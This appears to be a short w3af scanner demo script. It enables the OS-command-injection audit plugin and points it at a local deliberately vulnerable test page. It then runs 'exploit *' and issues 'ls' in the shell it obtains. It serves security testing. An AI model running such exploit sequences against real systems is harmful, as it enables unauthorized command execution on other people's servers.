# This is the "exploit *" demo: plugins audit osCommanding audit output console back target set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 back start exploit exploit * ls